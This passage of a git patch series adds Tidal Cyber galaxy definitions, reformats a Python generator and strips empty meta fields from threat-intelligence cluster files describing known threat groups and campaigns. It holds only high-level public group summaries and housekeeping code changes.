"icon": "bullhorn", + "name": "Tidal Campaigns", + "namespace": "tidal", + "type": "campaigns", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "version": 1 +} diff --git a/galaxies/tidal-groups.json b/galaxies/tidal-groups.json new file mode 100644 index 0000000..5bda54a --- /dev/null +++ b/galaxies/tidal-groups.json @@ -0,0 +1,9 @@ +{ + "description": "Tidal Groups Galaxy", + "icon": "user-secret", + "name": "Tidal Groups", + "namespace": "tidal", + "type": "groups", + "uuid": "41c3e5c0-de5c-4edb-b48b-48cd8e7519e6", + "version": 1 +} diff --git a/galaxies/tidal-references.json b/galaxies/tidal-references.json new file mode 100644 index 0000000..7ff95cb --- /dev/null +++ b/galaxies/tidal-references.json @@ -0,0 +1,9 @@ +{ + "description": "Tidal References Galaxy", + "icon": "list", + "name": "Tidal References", + "namespace": "tidal", + "type": "references", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "version": 1 +} diff --git a/galaxies/tidal-software.json b/galaxies/tidal-software.json new file mode 100644 index 0000000..7686bff --- /dev/null +++ b/galaxies/tidal-software.json @@ -0,0 +1,9 @@ +{ + "description": "Tidal Software Galaxy", + "icon": "file-code", + "name": "Tidal Software", + "namespace": "tidal", + "type": "software", + "uuid": "38d62d8b-4c49-489a-9bc4-8e294c4f04f7", + "version": 1 +} diff --git a/galaxies/tidal-tactic.json b/galaxies/tidal-tactic.json new file mode 100644 index 0000000..55edb06 --- /dev/null +++ b/galaxies/tidal-tactic.json @@ -0,0 +1,9 @@ +{ + "description": "Tidal Tactic Galaxy", + "icon": "map", + "name": "Tidal Tactic", + "namespace": "tidal", + "type": "tactic", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "version": 1 +} diff --git a/galaxies/tidal-technique.json b/galaxies/tidal-technique.json new file mode 100644 index 0000000..f1571ac --- /dev/null +++ b/galaxies/tidal-technique.json @@ -0,0 +1,9 @@ +{ + "description": "Tidal Technique Galaxy", + "icon": "user-ninja", + "name": "Tidal Technique", + "namespace": "tidal", + "type": "technique", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "version": 1 +} diff --git a/tools/tidal-api/main.py b/tools/tidal-api/main.py index af04a0d..469c164 100644 --- a/tools/tidal-api/main.py +++ b/tools/tidal-api/main.py @@ -17,7 +17,12 @@ GALAXY_PATH = "../../galaxies" CLUSTER_PATH = "../../clusters" -def create_galaxy(endpoint: str, version: int, extended_relations: bool = False, create_subs: bool = False): +def create_galaxy( + endpoint: str, + version: int, + extended_relations: bool = False, + create_subs: bool = False, +): api = TidalAPI() data = api.get_data(endpoint) with open(f"{CONFIG}/{endpoint}.json", "r") as file: @@ -28,16 +33,28 @@ def create_galaxy(endpoint: str, version: int, extended_relations: bool = False, match endpoint: case "groups": - cluster = GroupCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations, subs=create_subs) + cluster = GroupCluster( + **config["cluster"], + uuid=galaxy.uuid, + enrichment=extended_relations, + subs=create_subs, + ) cluster.add_values(data) case "software": - cluster = SoftwareCluster(**config["cluster"], uuid=galaxy.uuid, enrichment=extended_relations, subs=create_subs) + cluster = SoftwareCluster( + **config["cluster"], + uuid=galaxy.uuid, + enrichment=extended_relations, + subs=create_subs, + ) cluster.add_values(data) case "campaigns": cluster = CampaignsCluster(**config["cluster"], uuid=galaxy.uuid) cluster.add_values(data) case "technique": - cluster = TechniqueCluster(**config["cluster"], uuid=galaxy.uuid, subs=create_subs) + cluster = TechniqueCluster( + **config["cluster"], uuid=galaxy.uuid, subs=create_subs + ) cluster.add_values(data) case "tactic": cluster = TacticCluster(**config["cluster"], uuid=galaxy.uuid) @@ -56,9 +73,13 @@ def create_galaxy(endpoint: str, version: int, extended_relations: bool = False, def main(args, galaxies): if args.all: for galaxy in galaxies: - create_galaxy(galaxy, args.version, args.extended_relations, args.create_subs) + create_galaxy( + galaxy, args.version, args.extended_relations, args.create_subs + ) else: - create_galaxy(args.type, args.version, args.extended_relations, args.create_subs) + create_galaxy( + args.type, args.version, args.extended_relations, args.create_subs + ) if __name__ == "__main__": diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 7759643..c6703fd 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -334,7 +334,9 @@ class SoftwareCluster(Cluster): self.values.append(value.return_value()) related.append( { - "dest-uuid": associated_software.get("associated_software_id"), + "dest-uuid": associated_software.get( + "associated_software_id" + ), "type": "similar", } ) diff --git a/tools/tidal-api/models/galaxy.py b/tools/tidal-api/models/galaxy.py index 1946a4b..075511a 100644 --- a/tools/tidal-api/models/galaxy.py +++ b/tools/tidal-api/models/galaxy.py @@ -1,8 +1,9 @@ import json from dataclasses import dataclass, asdict + @dataclass -class Galaxy(): +class Galaxy: description: str icon: str name: str @@ -13,4 +14,4 @@ class Galaxy(): def save_to_file(self, path: str): with open(path, "w") as file: - file.write(json.dumps(asdict(self), indent=4)) \ No newline at end of file + file.write(json.dumps(asdict(self), indent=4)) From 5be77f6c2d38309f84977443729ae1de02fd80a1 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 14:41:53 +0100 Subject: [PATCH 36/49] Fix [tidal] exclude empty meta fields --- clusters/tidal-campaigns.json | 60 +-- clusters/tidal-groups.json | 318 ++-------------- clusters/tidal-software.json | 346 ----------------- clusters/tidal-tactic.json | 42 +-- clusters/tidal-technique.json | 603 ++++++++++-------------------- tools/tidal-api/models/cluster.py | 2 +- 6 files changed, 269 insertions(+), 1102 deletions(-) diff --git a/clusters/tidal-campaigns.json b/clusters/tidal-campaigns.json index 4e14ec3..9bf6ae3 100644 --- a/clusters/tidal-campaigns.json +++ b/clusters/tidal-campaigns.json @@ -13,8 +13,7 @@ "campaign_attack_id": "C0028", "first_seen": "2015-12-01T05:00:00Z", "last_seen": "2016-01-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "96e367d0-a744-5b63-85ec-595f505248a3", @@ -26,8 +25,7 @@ "campaign_attack_id": "C0025", "first_seen": "2016-12-01T05:00:00Z", "last_seen": "2016-12-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "06197e03-e1c1-56af-ba98-5071f98f91f1", @@ -172,8 +170,7 @@ "campaign_attack_id": "C0010", "first_seen": "2020-12-01T07:00:00Z", "last_seen": "2022-08-01T06:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "a1e33caf-6eb0-442f-b97a-f6042f21df48", @@ -185,8 +182,7 @@ "campaign_attack_id": "C0011", "first_seen": "2021-12-01T06:00:00Z", "last_seen": "2022-07-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "4c7386a7-9741-4ae4-8ad9-def03ed77e29", @@ -245,8 +241,7 @@ "campaign_attack_id": "C0021", "first_seen": "2018-11-01T05:00:00Z", "last_seen": "2018-11-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "86bed8da-4cab-55fe-a2d0-9214db1a09cf", @@ -258,8 +253,7 @@ "campaign_attack_id": "C0026", "first_seen": "2022-08-01T05:00:00Z", "last_seen": "2022-09-01T04:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "41f283a1-b2ac-547d-98d5-ff907afd08c7", @@ -271,8 +265,7 @@ "campaign_attack_id": "C0027", "first_seen": "2022-06-01T04:00:00Z", "last_seen": "2022-12-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "a9719584-4f52-5a5d-b0f7-1059e715c2b8", @@ -302,8 +295,7 @@ "campaign_attack_id": "C0004", "first_seen": "2019-10-01T04:00:00Z", "last_seen": "2020-11-01T04:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "fb011ed2-bfb9-4f0f-bd88-8b3fa0cf9b48", @@ -353,8 +345,7 @@ "campaign_attack_id": "C0001", "first_seen": "2019-01-01T06:00:00Z", "last_seen": "2019-04-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "2fab9878-8aae-445a-86db-6b47b473f56b", @@ -366,8 +357,7 @@ "campaign_attack_id": "C0007", "first_seen": "2018-07-01T05:00:00Z", "last_seen": "2020-11-01T04:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "94587edf-0292-445b-8c66-b16629597f1e", @@ -397,8 +387,7 @@ "first_seen": "2020-09-20T00:00:00Z", "last_seen": "2020-10-20T00:00:00Z", "owner": "TidalCyberIan", - "source": "Tidal Cyber", - "tags": [] + "source": "Tidal Cyber" }, "related": [], "uuid": "18cf25b5-ed3a-40f6-bf0a-a3938a4f8da2", @@ -497,8 +486,7 @@ "campaign_attack_id": "C0002", "first_seen": "2009-11-01T04:00:00Z", "last_seen": "2011-02-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "85f136b3-d5a3-4c4c-a37c-40e4418dc989", @@ -510,8 +498,7 @@ "campaign_attack_id": "C0012", "first_seen": "2019-12-01T07:00:00Z", "last_seen": "2022-05-01T06:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "81bf4e45-f0d3-4fec-a9d4-1259cf8542a1", @@ -523,8 +510,7 @@ "campaign_attack_id": "C0022", "first_seen": "2019-09-01T04:00:00Z", "last_seen": "2020-08-01T04:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "9a94e646-cbe5-54a1-8bf6-70ef745e641b", @@ -536,8 +522,7 @@ "campaign_attack_id": "C0016", "first_seen": "2010-01-01T07:00:00Z", "last_seen": "2016-02-01T06:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "af0c0f55-dc4f-4cb5-9350-3a2d7c07595f", @@ -549,8 +534,7 @@ "campaign_attack_id": "C0023", "first_seen": "2013-09-01T04:00:00Z", "last_seen": "2019-10-01T04:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "1fcfe949-5f96-578e-86ad-069ba123c867", @@ -562,8 +546,7 @@ "campaign_attack_id": "C0006", "first_seen": "2017-08-01T05:00:00Z", "last_seen": "2018-02-01T06:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "f741ed36-2d52-40ae-bbdc-70722f4071c7", @@ -575,8 +558,7 @@ "campaign_attack_id": "C0013", "first_seen": "2017-09-01T05:00:00Z", "last_seen": "2019-03-01T06:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "57e858c8-fd0b-4382-a178-0165d03aa8a9", @@ -588,8 +570,7 @@ "campaign_attack_id": "C0005", "first_seen": "2019-11-01T05:00:00Z", "last_seen": "2021-01-01T06:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "98d3a8ac-6af9-4471-83f6-e880ca70261f", @@ -601,8 +582,7 @@ "campaign_attack_id": "C0014", "first_seen": "2017-12-01T05:00:00Z", "last_seen": "2019-12-01T05:00:00Z", - "source": "MITRE", - "tags": [] + "source": "MITRE" }, "related": [], "uuid": "56e4e10f-8c8c-4b7c-8355-7ed89af181be", diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json index b4b835d..a288078 100644 --- a/clusters/tidal-groups.json +++ b/clusters/tidal-groups.json @@ -16,9 +16,7 @@ "HK", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Financial Services" ] @@ -106,11 +104,7 @@ "description": "[Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]", "meta": { "group_attack_id": "G0130", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -178,7 +172,6 @@ "Destruction" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Agriculture", @@ -211,10 +204,8 @@ "IL", "US" ], - "observed_motivations": [], "owner": "TidalCyberIan", "source": "Tidal Cyber", - "tags": [], "target_categories": [ "Education", "Government", @@ -258,7 +249,6 @@ "AE", "US" ], - "observed_motivations": [], "owner": "TidalCyberIan", "source": "Tidal Cyber", "tags": [ @@ -287,11 +277,7 @@ "description": "[Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) and UNC94, based on malware, infrastructure, and targets.[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)]", "meta": { "group_attack_id": "G1007", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "454402a3-0503-45bf-b2e0-177fa2e2d412", @@ -363,9 +349,7 @@ "US", "VN" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Agriculture", @@ -474,9 +458,7 @@ "TW", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Government", "High Tech", @@ -514,9 +496,7 @@ "TW", "TH" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Financial Services", "Technology" @@ -563,9 +543,7 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government", @@ -634,10 +612,7 @@ "description": "[APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. [[Dell Lateral Movement](https://app.tidalcyber.com/references/fcc9b52a-751f-4985-8c32-7aaf411706ad)]", "meta": { "group_attack_id": "G0026", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Government", "Healthcare", @@ -733,9 +708,7 @@ "AU", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Education", @@ -859,7 +832,6 @@ ], "owner": "TidalCyberIan", "source": "Tidal Cyber", - "tags": [], "target_categories": [ "Aerospace", "Casinos Gambling", @@ -1705,10 +1677,7 @@ "US", "VN" ], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -1767,7 +1736,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government", "Media" @@ -1838,7 +1806,6 @@ "US", "VN" ], - "observed_motivations": [], "source": "MITRE", "tags": [ "115113f0-5876-4aa5-b731-5ad46f60c069" @@ -1942,7 +1909,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Energy" @@ -2069,9 +2035,7 @@ "RU", "VN" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Automotive", @@ -2227,7 +2191,6 @@ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Banks", "Casinos Gambling", @@ -2320,9 +2283,7 @@ "AE", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Education", "Hospitality Leisure", @@ -2466,9 +2427,7 @@ "observed_countries": [ "CO" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Banks", "Energy", @@ -2491,12 +2450,10 @@ "meta": { "country": "CN", "group_attack_id": "G0143", - "observed_countries": [], "observed_motivations": [ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Government", "Technology", @@ -2536,7 +2493,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Defense", @@ -2585,9 +2541,7 @@ "GB", "UZ" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Government", "Non Profit", @@ -2665,11 +2619,7 @@ "description": "[BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)][[Forcepoint BITTER Pakistan Oct 2016](https://app.tidalcyber.com/references/9fc54fb0-b7d9-49dc-b6dd-ab4cb2cd34fa)]", "meta": { "group_attack_id": "G1002", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -2826,10 +2776,7 @@ "TN", "GB" ], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -2918,7 +2865,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Construction", "Defense", @@ -2959,13 +2905,10 @@ "description": "[Blue Mockingbird](https://app.tidalcyber.com/groups/b82c6ed1-c74a-4128-8b4d-18d1e17e1134) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)]", "meta": { "group_attack_id": "G0108", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "b82c6ed1-c74a-4128-8b4d-18d1e17e1134", @@ -3018,7 +2961,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Chemical", "Defense", @@ -3094,7 +3036,6 @@ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Financial Services" ] @@ -3120,9 +3061,7 @@ "observed_countries": [ "TW" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Semi Conductors", "Travel Services" @@ -3184,9 +3123,7 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Chemical", @@ -3337,7 +3274,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government" @@ -3369,7 +3305,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Education", @@ -3390,11 +3325,7 @@ "description": "[CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://app.tidalcyber.com/groups/ab15a328-c41e-5701-993f-3cab29ac4544) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.[[Microsoft Iranian Threat Actor Trends November 2021](https://app.tidalcyber.com/references/78d39ee7-1cd5-5cb8-844a-1c3649e367a1)]", "meta": { "group_attack_id": "G1012", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "ab15a328-c41e-5701-993f-3cab29ac4544", @@ -3495,9 +3426,7 @@ "observed_motivations": [ "Cyber Espionage" ], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -3543,9 +3472,7 @@ "TH", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Government", @@ -3571,10 +3498,7 @@ "description": "[DarkHydrus](https://app.tidalcyber.com/groups/f2b31240-0b4a-4fa4-82a4-6bb00e146e75) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. [[Unit 42 DarkHydrus July 2018](https://app.tidalcyber.com/references/800279cf-e6f8-4721-818f-46e35ec7892a)] [[Unit 42 Playbook Dec 2017](https://app.tidalcyber.com/references/9923f9ff-a7b8-4058-8213-3c83c54c10a6)]", "meta": { "group_attack_id": "G0079", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Education", "Government" @@ -3593,12 +3517,10 @@ "description": "[DarkVishnya](https://app.tidalcyber.com/groups/d428f9be-6faf-4d57-b677-4a927fea5f7e) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.[[Securelist DarkVishnya Dec 2018](https://app.tidalcyber.com/references/da9ac5a7-c644-45fa-ab96-30ac6bfc9f81)]", "meta": { "group_attack_id": "G0105", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Banks", "Financial Services" @@ -3696,7 +3618,6 @@ "Cyber Espionage" ], "source": "MITRE", - "tags": [], "target_categories": [ "Aerospace", "Agriculture", @@ -3919,9 +3840,7 @@ "RU", "TW" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Manufacturing", "Technology" @@ -3954,11 +3873,7 @@ "description": "[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) operations may be financially motivated.[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]\n\n[Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e) has used malware commonly used by other Chinese threat groups, including [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) and the [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) cluster, however security researchers assess [Earth Lusca](https://app.tidalcyber.com/groups/646e35d2-75de-4c1d-8ad3-616d3e155c5e)'s techniques and infrastructure are separate.[[TrendMicro EarthLusca 2022](https://app.tidalcyber.com/references/f6e1bffd-e35b-4eae-b9bf-c16a82bf7004)]", "meta": { "group_attack_id": "G1006", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -4029,9 +3944,7 @@ "GB", "US" ], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Defense", "Human Rights", @@ -4149,11 +4062,7 @@ "description": "[Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) likely conducted the [WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) destructive wiper attacks against Ukraine in early 2022.[[CrowdStrike Ember Bear Profile March 2022](https://app.tidalcyber.com/references/0639c340-b495-4d91-8418-3069f3fe0df1)][[Mandiant UNC2589 March 2022](https://app.tidalcyber.com/references/63d89139-9dd4-4ed6-bf6e-8cd872c5d034)][[Palo Alto Unit 42 OutSteel SaintBot February 2022 ](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)] ", "meta": { "group_attack_id": "G1003", - "observed_countries": [], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [ { @@ -4223,7 +4132,6 @@ "US", "YE" ], - "observed_motivations": [], "source": "MITRE", "tags": [ "a98d7a43-f227-478e-81de-e7299639a355" @@ -4259,7 +4167,6 @@ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Financial Services" ] @@ -4272,14 +4179,11 @@ "description": "[EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) is a financially motivated group that has been closely linked with [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8) and the deployment of ransomware including [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) and [Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67). [EXOTIC LILY](https://app.tidalcyber.com/groups/396a4361-3e84-47bc-9544-58e287c05799) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.[[Google EXOTIC LILY March 2022](https://app.tidalcyber.com/references/19d2cb48-bdb2-41fe-ba24-0769d7bd4d94)]", "meta": { "group_attack_id": "G1011", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", "tags": [ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" - ], - "target_categories": [] + ] }, "related": [], "uuid": "396a4361-3e84-47bc-9544-58e287c05799", @@ -4292,10 +4196,7 @@ "observed_countries": [ "IR" ], - "observed_motivations": [], - "source": "MITRE", - "tags": [], - "target_categories": [] + "source": "MITRE" }, "related": [], "uuid": "275ca7b0-3b21-4c3a-8b6f-57b6f0ffb6fb", @@ -4313,7 +4214,6 @@ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Casinos Gambling", "Hospitality Leisure", @@ -4418,7 +4318,6 @@ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Commercial", "Financial Services", @@ -4439,12 +4338,10 @@ "description": "[FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)][[FireEye FIN4 Stealing Insider NOV 2014](https://app.tidalcyber.com/references/b27f1040-46e5-411a-b238-0b40f6160680)] [FIN4](https://app.tidalcyber.com/groups/4b6531dc-5b29-4577-8b54-fa99229ab0ca) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.[[FireEye Hacking FIN4 Dec 2014](https://app.tidalcyber.com/references/c3ac1c2a-21cc-42a9-a214-88f302371766)][[FireEye Hacking FIN4 Video Dec 2014](https://app.tidalcyber.com/references/6dcfe3fb-c310-49cf-a657-f2cec65c5499)]", "meta": { "group_attack_id": "G0085", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Financial Services", "Healthcare", @@ -4464,12 +4361,10 @@ "description": "[FIN5](https://app.tidalcyber.com/groups/7902f5cc-d6a5-4a57-8d54-4c75e0c58b83) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. [[FireEye Respond Webinar July 2017](https://app.tidalcyber.com/references/e7091d66-7faa-49d6-b16f-be1f79db4471)] [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", "meta": { "group_attack_id": "G0053", - "observed_countries": [], "observed_motivations": [ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Entertainment", "Hospitality Leisure" @@ -4537,7 +4432,6 @@ "Financial Gain" ], "source": "MITRE", - "tags": [], "target_categories": [ "Financial Services", "Hospitality Leisure", @@ -4857,10 +4751,7 @@ "meta": { "country": "CN", "group_attack_id": "G0093", - "observed_countries": [], - "observed_motivations": [], "source": "MITRE", - "tags": [], "target_categories": [ "Telecommunications" ] @@ -4878,12 +4769,10 @@ "description": "[Gallmaker](https://app.tidalcyber.com/groups/cd483597-4eda-4e16-bb58-353488511410) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.[[Symantec Gallmaker Oct 2018](https://app.tidalcyber.com/references/f47b3e2b-acdd-4487-88b9-de5cbe45cf33)]", "meta": { "group_attack_id": "G0084", - 